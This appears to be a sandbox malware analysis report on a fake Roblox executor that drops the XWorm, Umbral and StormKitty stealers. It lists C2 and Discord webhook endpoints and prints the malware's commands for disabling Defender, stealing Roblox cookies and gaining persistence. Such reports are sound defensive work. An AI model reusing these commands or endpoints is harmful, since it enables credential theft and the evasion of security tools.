stormkitty | d9ca4eaa59a18b4b30518a5c85c757a8b04240e579a1460f0472c608aa2b7bc2

Analysis

max time kernel
1842s
max time network
1851s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
09-07-2024 12:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Solara roblox.exe
Size

102KB
MD5

ce28d82fa8e4dbbd72cae1bf8d4930e1
SHA1

0cba2f93bc5c9d9e4f950c66e7ac3acee3ce418f
SHA256

d9ca4eaa59a18b4b30518a5c85c757a8b04240e579a1460f0472c608aa2b7bc2
SHA512

ba5506f4dfa1c46e9ac38ca1c6ffabd1870eb4c99d98dae963dda8c387cc1c423a1cbef09f93befba889a65f8f51f34663f64dbb14743c82d8ec40fc036fe57e
SSDEEP

3072:Eb1Z3z4aicVw+NUbUq5dikO3WGWlxUJ1lbE812:Eb1ldC+UbUSdiIdnUJfEm

Score

10^/10

stormkitty umbral xworm execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

127.0.0.1:62559

19.ip.gl.ply.gg:62559

Attributes

Install_directory
%AppData%
install_file
svchost.exe

Extracted

Family

umbral

https://discord.com/api/webhooks/1260178339398684763/vrimjbksRiAdnQJhpf4RiMhDKhDPxfoJKYZ-ILxv3PIxTVVzEhCZeqgCy8f3wVpGOLPx

Signatures

Detect Umbral payload 5 IoCs

resource	yara_rule
behavioral1/files/0x0004000000004ed7-41.dat	family_umbral
behavioral1/memory/2584-42-0x0000000000A50000-0x0000000000A96000-memory.dmp	family_umbral
behavioral1/memory/2300-117-0x0000000000B20000-0x0000000000B66000-memory.dmp	family_umbral
behavioral1/memory/916-161-0x0000000000EC0000-0x0000000000F06000-memory.dmp	family_umbral
behavioral1/memory/2904-208-0x00000000001F0000-0x0000000000236000-memory.dmp	family_umbral

Detect Xworm Payload 22 IoCs

resource	yara_rule
behavioral1/memory/2912-1-0x0000000001090000-0x00000000010B0000-memory.dmp	family_xworm
behavioral1/files/0x000b0000000120f1-32.dat	family_xworm
behavioral1/memory/1712-34-0x0000000000F30000-0x0000000000F50000-memory.dmp	family_xworm
behavioral1/memory/2456-109-0x0000000001290000-0x00000000012B0000-memory.dmp	family_xworm
behavioral1/memory/1232-251-0x0000000000210000-0x0000000000230000-memory.dmp	family_xworm
behavioral1/memory/1672-277-0x00000000010A0000-0x00000000010C0000-memory.dmp	family_xworm
behavioral1/memory/2464-279-0x0000000000230000-0x0000000000250000-memory.dmp	family_xworm
behavioral1/memory/1408-281-0x00000000010B0000-0x00000000010D0000-memory.dmp	family_xworm
behavioral1/memory/1800-284-0x0000000000190000-0x00000000001B0000-memory.dmp	family_xworm
behavioral1/memory/1988-286-0x0000000000F70000-0x0000000000F90000-memory.dmp	family_xworm
behavioral1/memory/872-289-0x00000000001F0000-0x0000000000210000-memory.dmp	family_xworm
behavioral1/memory/2604-290-0x0000000001220000-0x0000000001240000-memory.dmp	family_xworm
behavioral1/memory/1740-291-0x0000000000290000-0x00000000002B0000-memory.dmp	family_xworm
behavioral1/memory/1120-292-0x0000000000AA0000-0x0000000000AC0000-memory.dmp	family_xworm
behavioral1/memory/1292-293-0x0000000000F90000-0x0000000000FB0000-memory.dmp	family_xworm
behavioral1/memory/1860-294-0x00000000001B0000-0x00000000001D0000-memory.dmp	family_xworm
behavioral1/memory/1204-295-0x00000000010E0000-0x0000000001100000-memory.dmp	family_xworm
behavioral1/memory/2208-296-0x00000000012B0000-0x00000000012D0000-memory.dmp	family_xworm
behavioral1/memory/2612-297-0x0000000000360000-0x0000000000380000-memory.dmp	family_xworm
behavioral1/memory/2668-298-0x0000000000BA0000-0x0000000000BC0000-memory.dmp	family_xworm
behavioral1/memory/2064-299-0x0000000000CB0000-0x0000000000CD0000-memory.dmp	family_xworm
behavioral1/memory/2452-300-0x00000000003A0000-0x00000000003C0000-memory.dmp	family_xworm

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral1/memory/2912-82-0x000000001B9C0000-0x000000001BAE0000-memory.dmp	family_stormkitty

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2456	powershell.exe
2208	powershell.exe
2256	powershell.exe
2872	powershell.exe
824	powershell.exe
2916	powershell.exe
2724	powershell.exe
3068	powershell.exe

Drops file in Drivers directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	gyfdsf.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cqswzx.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Solara.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	iednmj.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	Solara roblox.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	Solara roblox.exe

Executes dropped EXE 35 IoCs

pid	Process
1712	svchost.exe
2584	gyfdsf.exe
2708	svchost.exe
2456	svchost.exe
1052	svchost.exe
2300	cqswzx.exe
1636	svchost.exe
916	Solara.exe
2904	iednmj.exe
1232	svchost.exe
1672	svchost.exe
2464	svchost.exe
1408	svchost.exe
2492	svchost.exe
1800	svchost.exe
1988	svchost.exe
556	svchost.exe
872	svchost.exe
2604	svchost.exe
2512	svchost.exe
2324	svchost.exe
1740	svchost.exe
1120	svchost.exe
1292	svchost.exe
2464	svchost.exe
1860	svchost.exe
1204	svchost.exe
308	svchost.exe
652	svchost.exe
1784	svchost.exe
2208	svchost.exe
2612	svchost.exe
2668	svchost.exe
2064	svchost.exe
2452	svchost.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe"	Solara roblox.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

flow	ioc
33	discord.com
34	discord.com
10	discord.com
11	discord.com
19	discord.com
20	discord.com
26	discord.com
27	discord.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	ip-api.com
15	ip-api.com
23	ip-api.com
30	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 4 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1560	wmic.exe
1304	wmic.exe
2384	wmic.exe
2256	wmic.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

pid	Process
2644	PING.EXE
2372	PING.EXE
1708	PING.EXE
1924	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1256	schtasks.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

pid	Process
2916	powershell.exe
2724	powershell.exe
3068	powershell.exe
2456	powershell.exe
2912	Solara roblox.exe
2584	gyfdsf.exe
2208	powershell.exe
2292	powershell.exe
1028	powershell.exe
2156	powershell.exe
1740	powershell.exe
2912	Solara roblox.exe
2912	Solara roblox.exe
2912	Solara roblox.exe
2912	Solara roblox.exe
2912	Solara roblox.exe
2912	Solara roblox.exe
2300	cqswzx.exe
2256	powershell.exe
1232	powershell.exe
2384	powershell.exe
2836	powershell.exe
916	Solara.exe
2872	powershell.exe
652	powershell.exe
2476	powershell.exe
1508	powershell.exe
1576	powershell.exe
2904	iednmj.exe
824	powershell.exe
2372	powershell.exe
2524	powershell.exe
2348	powershell.exe
1512	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2912	Solara roblox.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2912	Solara roblox.exe
Token: SeDebugPrivilege	2916	powershell.exe
Token: SeDebugPrivilege	2724	powershell.exe
Token: SeDebugPrivilege	3068	powershell.exe
Token: SeDebugPrivilege	2456	powershell.exe
Token: SeDebugPrivilege	2912	Solara roblox.exe
Token: SeDebugPrivilege	1712	svchost.exe
Token: SeDebugPrivilege	2584	gyfdsf.exe
Token: SeIncreaseQuotaPrivilege	3004	wmic.exe
Token: SeSecurityPrivilege	3004	wmic.exe
Token: SeTakeOwnershipPrivilege	3004	wmic.exe
Token: SeLoadDriverPrivilege	3004	wmic.exe
Token: SeSystemProfilePrivilege	3004	wmic.exe
Token: SeSystemtimePrivilege	3004	wmic.exe
Token: SeProfSingleProcessPrivilege	3004	wmic.exe
Token: SeIncBasePriorityPrivilege	3004	wmic.exe
Token: SeCreatePagefilePrivilege	3004	wmic.exe
Token: SeBackupPrivilege	3004	wmic.exe
Token: SeRestorePrivilege	3004	wmic.exe
Token: SeShutdownPrivilege	3004	wmic.exe
Token: SeDebugPrivilege	3004	wmic.exe
Token: SeSystemEnvironmentPrivilege	3004	wmic.exe
Token: SeRemoteShutdownPrivilege	3004	wmic.exe
Token: SeUndockPrivilege	3004	wmic.exe
Token: SeManageVolumePrivilege	3004	wmic.exe
Token: 33	3004	wmic.exe
Token: 34	3004	wmic.exe
Token: 35	3004	wmic.exe
Token: SeIncreaseQuotaPrivilege	3004	wmic.exe
Token: SeSecurityPrivilege	3004	wmic.exe
Token: SeTakeOwnershipPrivilege	3004	wmic.exe
Token: SeLoadDriverPrivilege	3004	wmic.exe
Token: SeSystemProfilePrivilege	3004	wmic.exe
Token: SeSystemtimePrivilege	3004	wmic.exe
Token: SeProfSingleProcessPrivilege	3004	wmic.exe
Token: SeIncBasePriorityPrivilege	3004	wmic.exe
Token: SeCreatePagefilePrivilege	3004	wmic.exe
Token: SeBackupPrivilege	3004	wmic.exe
Token: SeRestorePrivilege	3004	wmic.exe
Token: SeShutdownPrivilege	3004	wmic.exe
Token: SeDebugPrivilege	3004	wmic.exe
Token: SeSystemEnvironmentPrivilege	3004	wmic.exe
Token: SeRemoteShutdownPrivilege	3004	wmic.exe
Token: SeUndockPrivilege	3004	wmic.exe
Token: SeManageVolumePrivilege	3004	wmic.exe
Token: 33	3004	wmic.exe
Token: 34	3004	wmic.exe
Token: 35	3004	wmic.exe
Token: SeDebugPrivilege	2208	powershell.exe
Token: SeDebugPrivilege	2292	powershell.exe
Token: SeDebugPrivilege	1028	powershell.exe
Token: SeDebugPrivilege	2156	powershell.exe
Token: SeIncreaseQuotaPrivilege	2392	wmic.exe
Token: SeSecurityPrivilege	2392	wmic.exe
Token: SeTakeOwnershipPrivilege	2392	wmic.exe
Token: SeLoadDriverPrivilege	2392	wmic.exe
Token: SeSystemProfilePrivilege	2392	wmic.exe
Token: SeSystemtimePrivilege	2392	wmic.exe
Token: SeProfSingleProcessPrivilege	2392	wmic.exe
Token: SeIncBasePriorityPrivilege	2392	wmic.exe
Token: SeCreatePagefilePrivilege	2392	wmic.exe
Token: SeBackupPrivilege	2392	wmic.exe
Token: SeRestorePrivilege	2392	wmic.exe
Token: SeShutdownPrivilege	2392	wmic.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2912	Solara roblox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2912 wrote to memory of 2916	2912	Solara roblox.exe	31
PID 2912 wrote to memory of 2916	2912	Solara roblox.exe	31
PID 2912 wrote to memory of 2916	2912	Solara roblox.exe	31
PID 2912 wrote to memory of 2724	2912	Solara roblox.exe	33
PID 2912 wrote to memory of 2724	2912	Solara roblox.exe	33
PID 2912 wrote to memory of 2724	2912	Solara roblox.exe	33
PID 2912 wrote to memory of 3068	2912	Solara roblox.exe	35
PID 2912 wrote to memory of 3068	2912	Solara roblox.exe	35
PID 2912 wrote to memory of 3068	2912	Solara roblox.exe	35
PID 2912 wrote to memory of 2456	2912	Solara roblox.exe	37
PID 2912 wrote to memory of 2456	2912	Solara roblox.exe	37
PID 2912 wrote to memory of 2456	2912	Solara roblox.exe	37
PID 2912 wrote to memory of 1256	2912	Solara roblox.exe	39
PID 2912 wrote to memory of 1256	2912	Solara roblox.exe	39
PID 2912 wrote to memory of 1256	2912	Solara roblox.exe	39
PID 1308 wrote to memory of 1712	1308	taskeng.exe	42
PID 1308 wrote to memory of 1712	1308	taskeng.exe	42
PID 1308 wrote to memory of 1712	1308	taskeng.exe	42
PID 2912 wrote to memory of 2584	2912	Solara roblox.exe	44
PID 2912 wrote to memory of 2584	2912	Solara roblox.exe	44
PID 2912 wrote to memory of 2584	2912	Solara roblox.exe	44
PID 2584 wrote to memory of 3004	2584	gyfdsf.exe	45
PID 2584 wrote to memory of 3004	2584	gyfdsf.exe	45
PID 2584 wrote to memory of 3004	2584	gyfdsf.exe	45
PID 2584 wrote to memory of 3016	2584	gyfdsf.exe	47
PID 2584 wrote to memory of 3016	2584	gyfdsf.exe	47
PID 2584 wrote to memory of 3016	2584	gyfdsf.exe	47
PID 2584 wrote to memory of 2208	2584	gyfdsf.exe	49
PID 2584 wrote to memory of 2208	2584	gyfdsf.exe	49
PID 2584 wrote to memory of 2208	2584	gyfdsf.exe	49
PID 2584 wrote to memory of 2292	2584	gyfdsf.exe	51
PID 2584 wrote to memory of 2292	2584	gyfdsf.exe	51
PID 2584 wrote to memory of 2292	2584	gyfdsf.exe	51
PID 2584 wrote to memory of 1028	2584	gyfdsf.exe	53
PID 2584 wrote to memory of 1028	2584	gyfdsf.exe	53
PID 2584 wrote to memory of 1028	2584	gyfdsf.exe	53
PID 2584 wrote to memory of 2156	2584	gyfdsf.exe	55
PID 2584 wrote to memory of 2156	2584	gyfdsf.exe	55
PID 2584 wrote to memory of 2156	2584	gyfdsf.exe	55
PID 2584 wrote to memory of 2392	2584	gyfdsf.exe	57
PID 2584 wrote to memory of 2392	2584	gyfdsf.exe	57
PID 2584 wrote to memory of 2392	2584	gyfdsf.exe	57
PID 2584 wrote to memory of 2092	2584	gyfdsf.exe	59
PID 2584 wrote to memory of 2092	2584	gyfdsf.exe	59
PID 2584 wrote to memory of 2092	2584	gyfdsf.exe	59
PID 2584 wrote to memory of 972	2584	gyfdsf.exe	61
PID 2584 wrote to memory of 972	2584	gyfdsf.exe	61
PID 2584 wrote to memory of 972	2584	gyfdsf.exe	61
PID 2584 wrote to memory of 1740	2584	gyfdsf.exe	63
PID 2584 wrote to memory of 1740	2584	gyfdsf.exe	63
PID 2584 wrote to memory of 1740	2584	gyfdsf.exe	63
PID 2584 wrote to memory of 1560	2584	gyfdsf.exe	65
PID 2584 wrote to memory of 1560	2584	gyfdsf.exe	65
PID 2584 wrote to memory of 1560	2584	gyfdsf.exe	65
PID 2584 wrote to memory of 2632	2584	gyfdsf.exe	67
PID 2584 wrote to memory of 2632	2584	gyfdsf.exe	67
PID 2584 wrote to memory of 2632	2584	gyfdsf.exe	67
PID 2632 wrote to memory of 2644	2632	cmd.exe	69
PID 2632 wrote to memory of 2644	2632	cmd.exe	69
PID 2632 wrote to memory of 2644	2632	cmd.exe	69
PID 1308 wrote to memory of 2708	1308	taskeng.exe	70
PID 1308 wrote to memory of 2708	1308	taskeng.exe	70
PID 1308 wrote to memory of 2708	1308	taskeng.exe	70
PID 1308 wrote to memory of 2456	1308	taskeng.exe	71

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3016	attrib.exe
1820	attrib.exe
1604	attrib.exe
680	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Solara roblox.exe
"C:\Users\Admin\AppData\Local\Temp\Solara roblox.exe"
1⤵
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2912
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara roblox.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2916
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Solara roblox.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2724
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3068
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2456
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1256
- C:\Users\Admin\AppData\Local\Temp\gyfdsf.exe
  "C:\Users\Admin\AppData\Local\Temp\gyfdsf.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2584
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3004
- - C:\Windows\system32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\gyfdsf.exe"
    3⤵
    - Views/modifies file attributes
    PID:3016
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\gyfdsf.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2208
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2292
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1028
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2156
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2392
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:2092
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:972
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1740
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1560
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\gyfdsf.exe" && pause
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2632
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:2644
- C:\Users\Admin\AppData\Local\Temp\cqswzx.exe
  "C:\Users\Admin\AppData\Local\Temp\cqswzx.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:2300
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:1016
- - C:\Windows\system32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\cqswzx.exe"
    3⤵
    - Views/modifies file attributes
    PID:1820
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cqswzx.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2256
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1232
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2384
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    PID:2528
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:2332
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:2228
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:2564
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2836
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1304
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\cqswzx.exe" && pause
    3⤵
    PID:1616
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:2372
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start "" "C:\Solara.exe"
  2⤵
  PID:2956
- - C:\Solara.exe
    "C:\Solara.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:916
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:2860
  - - C:\Windows\system32\attrib.exe
      "attrib.exe" +h +s "C:\Solara.exe"
      4⤵
      Views/modifies file attributes
      PID:1604
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Solara.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2872
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:652
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2476
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1508
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      PID:2156
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      PID:1952
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:2516
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1576
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2384
  - - C:\Windows\system32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Solara.exe" && pause
      4⤵
      PID:2952
    - - C:\Windows\system32\PING.EXE
        
        ping localhost
        5⤵
        Runs ping.exe
        
        PID:1708
- C:\Users\Admin\AppData\Local\Temp\iednmj.exe
  "C:\Users\Admin\AppData\Local\Temp\iednmj.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:2904
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:2628
- - C:\Windows\system32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\iednmj.exe"
    3⤵
    - Views/modifies file attributes
    PID:680
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\iednmj.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:824
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2372
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2524
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2348
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:2928
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:544
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:2436
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
